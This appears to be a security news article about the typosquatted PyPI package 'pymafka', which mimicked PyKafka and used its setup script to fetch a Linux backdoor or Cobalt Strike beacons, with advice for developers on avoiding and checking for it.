A malicious Python package has been spotted in the PyPI registry performing supply chain attacks. The aim is to drop backdoors and Cobalt Strike beacons on Linux, macOS, and Windows systems.
The malicious PyPI package
On May 17, attackers uploaded a malicious package 'pymafka' onto PyPI. The name is almost the same as PyKafka, an Apache Kafka client with over four million downloads on the PyPI registry.
- The typosquatted package reached 325 people and may cause damage to those affected as it provides initial access to the internal network of the developer.
- After being reported, pymafka has been removed now.
- Through this trick, it could provide hackers initial access to the developer's network for spreading laterally to steal data, plant additional malware, or even launch ransomware attacks.
Infection process
A researcher claimed that the infection starts with the execution of the 'setup[.]py' script spotted in the package. The script identifies the host operating system and downloads a compatible malicious payload.
- For Linux systems, the Python script connects to a remote URL and pipes the output to the bash shell. However, it is not known what commands are executed, and it is suspected to open a reverse shell.
- For macOS and Windows, the Cobalt Strike beacon is the payload delivered, which provides remote access to the compromised system. Its beacons are fileless shellcode agents that cannot be detected easily.
- It can be further used to deliver second-stage payloads, such as ransomware, or for lateral movement or espionage attacks.
What to do?
Software developers should be very careful about mistyped or typo-squatted package names while leveraging software libraries for their applications. They should examine package names and details, and make sure of their selection of building blocks. Further, developers who downloaded the malicious package must replace it quickly and check their systems for Linux backdoors and Cobalt Strike beacons.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/a783_shutterstock_1261948831.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/4108_shutterstock_1236577720.jpg)
